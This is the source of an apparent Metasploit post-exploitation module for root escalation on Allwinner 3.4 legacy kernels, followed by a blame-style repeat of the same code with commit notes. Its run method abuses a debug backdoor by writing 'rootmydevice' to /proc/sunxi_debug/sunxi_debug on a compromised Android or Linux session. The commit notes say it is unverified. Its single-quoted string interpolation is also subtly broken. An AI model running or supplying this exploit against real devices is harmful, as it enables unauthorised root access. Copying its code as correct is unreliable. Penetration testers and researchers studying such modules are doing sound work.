metasploit-framework/modules/post/multi/escalate/allwinner_backdoor.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Linux::Priv

  def initialize(info={})
    super( update_info( info,
        'Name'           => 'Allwinner 3.4 Legacy Kernel Local Privileges Escalation',
        'Description'    => %q{
          This module attempts to exploit a debug backdoor privilege escalation.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'h00die <mike@stcyrsecurity.com>',  # Module
            'KotCzarny'                         # Discovery
          ],
        'Platform'       => [ 'android', 'linux' ],
        'DisclosureDate' => 'Apr 30 2016',
        'References'     =>
          [
            [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
            [ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'],
            [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
          ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ]
      ))

  end

  def run
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      vprint_good 'Backdoor found, exploiting.'
      cmd_exec('echo "rootmydevice" > #{backdoor}')
      if is_root?
        print_good 'Privilege Escalation Successful'
        report_note(
          :host => session,
          :type => 'host.escalation',
          :data => 'Escalated to root shell via backdoor'
        )
      else
        print_error 'Privilege Escalation FAILED'
      end
    else
      print_error 'Backdoor #{backdoor} not found.'
    end
  end

end
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`require 'rex'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00
			`class MetasploitModule < Msf::Post`

			`include Msf::Post::File`
			`include Msf::Post::Linux::Priv`

			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Allwinner 3.4 Legacy Kernel Local Privileges Escalation',`
			`'Description' => %q{`
			`This module attempts to exploit a debug backdoor privilege escalation.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`'h00die <mike@stcyrsecurity.com>', # Module`
			`'KotCzarny' # Discovery`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`],`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`'Platform' => [ 'android', 'linux' ],`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`'DisclosureDate' => 'Apr 30 2016',`
			`'References' =>`
			`[`
			`[ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`[ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'],`
			`[ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`],`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`'SessionTypes' => [ 'shell', 'meterpreter' ]`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`))`

			`end`

			`def run`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`backdoor = '/proc/sunxi_debug/sunxi_debug'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`if file_exist?(backdoor)`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`vprint_good 'Backdoor found, exploiting.'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`cmd_exec('echo "rootmydevice" > #{backdoor}')`
			`if is_root?`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`print_good 'Privilege Escalation Successful'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`report_note(`
			`:host => session,`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`:type => 'host.escalation',`
			`:data => 'Escalated to root shell via backdoor'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`)`
			`else`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`print_error 'Privilege Escalation FAILED'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`end`
			`else`
additional details, not working on tablet via malicious apk meterpreter 2016-05-14 03:12:44 +00:00			`print_error 'Backdoor #{backdoor} not found.'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`end`
			`end`

			`end`